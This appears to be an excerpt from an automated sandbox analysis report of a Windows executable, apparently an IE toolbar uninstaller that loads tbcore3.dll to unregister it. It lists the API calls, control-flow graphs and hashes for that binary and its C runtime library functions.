                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 00B51006
                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00B51013
                                                                              • GetLastError.KERNEL32 ref: 00B5101F
                                                                              • GetCommandLineW.KERNEL32(?), ref: 00B51040
                                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 00B51047
                                                                              • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00B51061
                                                                              • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00B51073
                                                                              • LoadLibraryW.KERNELBASE(?), ref: 00B51085
                                                                              • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00B51097
                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 00B510A4
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00B510AB
                                                                              • CoUninitialize.COMBASE ref: 00B510B1
                                                                              • LocalFree.KERNEL32(00000000), ref: 00B510BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                              • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                              • API String ID: 474438367-4110843154
                                                                              • Opcode ID: 4102915ce8fe4ddf881c32e7ca9c57fe9215d3aae14ba13a7969ad3f830537bb
                                                                              • Instruction ID: aa67252619653170370de0995257bb56ee8c6e03244e17d31a2ec96a9a14fc12
                                                                              • Opcode Fuzzy Hash: 4102915ce8fe4ddf881c32e7ca9c57fe9215d3aae14ba13a7969ad3f830537bb
                                                                              • Instruction Fuzzy Hash: CD11B432505755EB83625B64AC48B6F37D8EA4476370809D5FD42E30D0DF218C4DC7B6
                                                                              Function 00B51465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 16 b51465-b51476 call b5143a ExitProcess
                                                                              APIs
                                                                              • ___crtCorExitProcess.LIBCMT ref: 00B5146D
                                                                                • Part of subcall function 00B5143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00B51472,?,?,00B554EE,000000FF,0000001E,?,00B536FC,?,00000001,?,?,00B52A2A,00000018), ref: 00B51444
                                                                                • Part of subcall function 00B5143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B51454
                                                                              • ExitProcess.KERNEL32 ref: 00B51476
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                              • String ID:
                                                                              • API String ID: 2427264223-0
                                                                              • Opcode ID: 37f0911e909a3aec82a1e46be1f10b29590e678cd405a7366b33ef31a95828e1
                                                                              • Instruction ID: 9df335a8e4189c46a2f07cb56806df2edc787b15a2bc3e2b65b0af93279236ce
                                                                              • Opcode Fuzzy Hash: 37f0911e909a3aec82a1e46be1f10b29590e678cd405a7366b33ef31a95828e1
                                                                              • Instruction Fuzzy Hash: 77B09B31000108BBDB012F15DC09A4D3F55FB403517548450F80845171DF719D959990
                                                                              Function 00B5261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 19 b5261b-b5263d HeapCreate 20 b52641-b5264a 19->20 21 b5263f-b52640 19->21
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00B52630
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 1c4d8f42a2aee5f1cd449b62a99adf282e2863697104fcba20d75802c772c4d5
                                                                              • Instruction ID: eb71e7880650e5b0e92da3b15d697fd56a47fcde8cc3f19af2e75504cebf52a2
                                                                              • Opcode Fuzzy Hash: 1c4d8f42a2aee5f1cd449b62a99adf282e2863697104fcba20d75802c772c4d5
                                                                              • Instruction Fuzzy Hash: DBD05E325543445EEB105F716C49B223BDCD384396F1444B5B90CC7290FA70C9948A40
                                                                              Function 00B51681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 22 b51681-b5168d call b51555 24 b51692-b51696 22->24
                                                                              APIs
                                                                              • _doexit.LIBCMT ref: 00B5168D
                                                                                • Part of subcall function 00B51555: __lock.LIBCMT ref: 00B51563
                                                                                • Part of subcall function 00B51555: __decode_pointer.LIBCMT ref: 00B5159A
                                                                                • Part of subcall function 00B51555: __decode_pointer.LIBCMT ref: 00B515AF
                                                                                • Part of subcall function 00B51555: __decode_pointer.LIBCMT ref: 00B515D9
                                                                                • Part of subcall function 00B51555: __decode_pointer.LIBCMT ref: 00B515EF
                                                                                • Part of subcall function 00B51555: __decode_pointer.LIBCMT ref: 00B515FC
                                                                                • Part of subcall function 00B51555: __initterm.LIBCMT ref: 00B5162B
                                                                                • Part of subcall function 00B51555: __initterm.LIBCMT ref: 00B5163B
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                              • String ID:
                                                                              • API String ID: 1597249276-0
                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                              • Instruction ID: 29cdaeb97a3c2e195be9bbdb226aa3fce81cf45e24cbe96f43ef372051cc69aa
                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                              • Instruction Fuzzy Hash: 3CB0923258020833DB20258AAC03F0A3A4987D0BA0E2600A0FA0C191E1AAA2A965808A

                                                                              Non-executed Functions

                                                                              Function 00B510CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00B51346
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B5135B
                                                                              • UnhandledExceptionFilter.KERNEL32(00B5816C), ref: 00B51366
                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00B51382
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00B51389
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                              • String ID:
                                                                              • API String ID: 2579439406-0
                                                                              • Opcode ID: 17fc2bfd287696a6e7b070cef09a316823f3210caa3ff546e62fdb7c20516784
                                                                              • Instruction ID: c3a47d1f0731b3e5b8e44df3686815ee397644a498573383d129ed8a87836818
                                                                              • Opcode Fuzzy Hash: 17fc2bfd287696a6e7b070cef09a316823f3210caa3ff546e62fdb7c20516784
                                                                              • Instruction Fuzzy Hash: 9F21CFB44013049FD751EF68ED447583BB4FB08343F5042EAE908A7AB0EFB45989CB46
                                                                              Function 00B521E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B59458,0000000C,00B52320,00000000,00000000,?,00B5174F,00000003,?,?,?,?,?,?,00B510F6), ref: 00B521F7
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00B52202
                                                                                • Part of subcall function 00B513E1: Sleep.KERNEL32(000003E8,00000000,?,00B52148,KERNEL32.DLL,?,00B52194,?,00B5174F,00000003), ref: 00B513ED
                                                                                • Part of subcall function 00B513E1: GetModuleHandleW.KERNEL32(?,?,00B52148,KERNEL32.DLL,?,00B52194,?,00B5174F,00000003,?,?,?,?,?,?,00B510F6), ref: 00B513F6
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B5222B
                                                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00B5223B
                                                                              • __lock.LIBCMT ref: 00B5225D
                                                                              • InterlockedIncrement.KERNEL32(00B5A4D8), ref: 00B5226A
                                                                              • __lock.LIBCMT ref: 00B5227E
                                                                              • ___addlocaleref.LIBCMT ref: 00B5229C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              • Opcode ID: 19d2882492bd574da375c144a1139e163855890910bd7267a4d2aecedb791fc4
                                                                              • Instruction ID: f015ee4f33a98aa36ccacd9e77125df82c92babbff643a6ea754691cf050dc5e
                                                                              • Opcode Fuzzy Hash: 19d2882492bd574da375c144a1139e163855890910bd7267a4d2aecedb791fc4
                                                                              • Instruction Fuzzy Hash: E611A271941701DEE720EF75D846B4ABBE0AF15312F1045D9EC99A33A0CF7499498F25
                                                                              Function 00B540A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 170 b540a0-b540bb call b5264c call b52345 175 b540bd-b540c1 170->175 176 b540da-b540f2 call b52aa0 170->176 175->176 177 b540c3 175->177 181 b540f4-b540f6 176->181 182 b5412a-b54136 call b5413b 176->182 179 b540c6-b540c8 177->179 183 b540d2-b540d9 call b52691 179->183 184 b540ca-b540d1 call b51411 179->184 185 b54112-b54124 InterlockedIncrement 181->185 186 b540f8-b54101 InterlockedDecrement 181->186 182->179 184->183 185->182 186->185 190 b54103-b54109 186->190 190->185 194 b5410b-b54111 call b535ee 190->194 194->185
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00B540AC
                                                                                • Part of subcall function 00B52345: __getptd_noexit.LIBCMT ref: 00B52348
                                                                                • Part of subcall function 00B52345: __amsg_exit.LIBCMT ref: 00B52355
                                                                              • __amsg_exit.LIBCMT ref: 00B540CC
                                                                              • __lock.LIBCMT ref: 00B540DC
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00B540F9
                                                                              • InterlockedIncrement.KERNEL32(00C92AF0), ref: 00B54124
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: 067eee5f26e68ee06e9c98818f2b7bc9a4c298047d02450ab7394aaaa83311d1
                                                                              • Instruction ID: d08036c4aa92a4a64c174e6a933f3cdfce2a7bd6b204a2f9aa8fa90e1d06412a
                                                                              • Opcode Fuzzy Hash: 067eee5f26e68ee06e9c98818f2b7bc9a4c298047d02450ab7394aaaa83311d1
                                                                              • Instruction Fuzzy Hash: B901E932902B219BEB26AF249806349BBE0FB00717F1841C5ED00B7291DB34A9C9CFD2
                                                                              Function 00B535EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 197 b535ee-b535ff call b5264c 200 b53676-b5367b call b52691 197->200 201 b53601-b53608 197->201 202 b5364d 201->202 203 b5360a-b53622 call b52aa0 call b545e4 201->203 205 b5364e-b5365e HeapFree 202->205 215 b53624-b5362c call b54614 203->215 216 b5362d-b5363d call b53644 203->216 205->200 208 b53660-b53675 call b52c72 GetLastError call b52c30 205->208 208->200 215->216 216->200 222 b5363f-b53642 216->222 222->205
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00B5360C
                                                                                • Part of subcall function 00B52AA0: __mtinitlocknum.LIBCMT ref: 00B52AB6
                                                                                • Part of subcall function 00B52AA0: __amsg_exit.LIBCMT ref: 00B52AC2
                                                                                • Part of subcall function 00B52AA0: EnterCriticalSection.KERNEL32(?,?,?,00B55600,00000004,00B59628,0000000C,00B53746,?,?,00000000,00000000,00000000,?,00B522F7,00000001), ref: 00B52ACA
                                                                              • ___sbh_find_block.LIBCMT ref: 00B53617
                                                                              • ___sbh_free_block.LIBCMT ref: 00B53626
                                                                              • HeapFree.KERNEL32(00000000,?,00B59568,0000000C,00B52A81,00000000,00B594C8,0000000C,00B52ABB,?,?,?,00B55600,00000004,00B59628,0000000C), ref: 00B53656
                                                                              • GetLastError.KERNEL32(?,00B55600,00000004,00B59628,0000000C,00B53746,?,?,00000000,00000000,00000000,?,00B522F7,00000001,00000214), ref: 00B53667
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              • Opcode ID: 737af079eaaa5c05809563a29dd956c314219c8ebcd51a8e1ecda3e48ece0f15
                                                                              • Instruction ID: 4aaa1230f0f1e6471902c081120871d4032257290c54d0d08451e76d0fd753bd
                                                                              • Opcode Fuzzy Hash: 737af079eaaa5c05809563a29dd956c314219c8ebcd51a8e1ecda3e48ece0f15
                                                                              • Instruction Fuzzy Hash: 28014F71D09305AADB217F719C06B5E36E4EF12BA3F6440CDFC0067292DF748A488A59
                                                                              Function 00B53E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 223 b53e04-b53e1f call b5264c call b52345 228 b53e21-b53e25 223->228 229 b53e43-b53e6c call b52aa0 call b53dc6 call b53e6e 223->229 228->229 230 b53e27-b53e2c call b52345 228->230 237 b53e2f-b53e31 229->237 230->237 239 b53e33-b53e3a call b51411 237->239 240 b53e3b-b53e42 call b52691 237->240 239->240
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00B53E10
                                                                                • Part of subcall function 00B52345: __getptd_noexit.LIBCMT ref: 00B52348
                                                                                • Part of subcall function 00B52345: __amsg_exit.LIBCMT ref: 00B52355
                                                                              • __getptd.LIBCMT ref: 00B53E27
                                                                              • __amsg_exit.LIBCMT ref: 00B53E35
                                                                              • __lock.LIBCMT ref: 00B53E45
                                                                              Memory Dump Source
                                                                              • Source File: 00000029.00000002.2676969443.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                              • Associated: 00000029.00000002.2676936054.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677028728.0000000000B5A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                              • Associated: 00000029.00000002.2677060748.0000000000B5C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_41_2_b50000_qH3CqQr.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              • Opcode ID: 3050dfd77d7db475e7f6c37a59c2b4f3cfc94d365a82b2a5766ac2fcaededfd7
                                                                              • Instruction ID: 1d8e5dc495a8bba53b4cfe7a62772b2c2ffaddc699915176760473ea83f5d14a
                                                                              • Opcode Fuzzy Hash: 3050dfd77d7db475e7f6c37a59c2b4f3cfc94d365a82b2a5766ac2fcaededfd7
                                                                              • Instruction Fuzzy Hash: 20F090329013008BD760BBB4840774D73E0AF45B53F1045D9EC41A73D1CF749A498BA2